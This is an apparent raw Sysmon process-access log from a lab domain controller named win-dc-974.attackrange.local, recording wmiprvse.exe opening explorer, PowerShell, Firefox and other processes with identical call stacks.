16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 